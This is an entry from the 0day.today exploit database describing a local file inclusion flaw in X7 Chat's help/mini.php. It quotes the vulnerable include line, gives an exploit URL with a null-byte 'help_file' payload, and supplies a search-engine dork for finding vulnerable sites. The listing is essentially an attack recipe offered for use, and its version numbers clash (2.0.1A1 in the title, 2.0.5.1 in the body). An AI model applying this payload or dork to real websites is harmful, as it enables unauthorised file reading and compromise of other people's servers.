[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

X7 Chat <= 2.0.1A1 (mini.php help_file) Local File Inclusion Vulnerability

Author
NoGe
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3776
Category
web applications
Date add
26-09-2008
Platform
unsorted
==========================================================================
X7 Chat <= 2.0.1A1 (mini.php help_file) Local File Inclusion Vulnerability
==========================================================================


====================================================================


  [o] X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability

       Software : X7 Chat version 2.0.5.1
       Vendor   : http://x7chat.com/
       Author   : NoGe

====================================================================


  [o] Vulnerable file

       help/mini.php

        include("./help/{$_GET['help_file']}");



  [o] Exploit

       http://localhost/[path]/help/mini.php?help_file=[LFI]%00



  [o] Dork

       "powered by x7 chat"


====================================================================



#  0day.today [2024-12-25]  #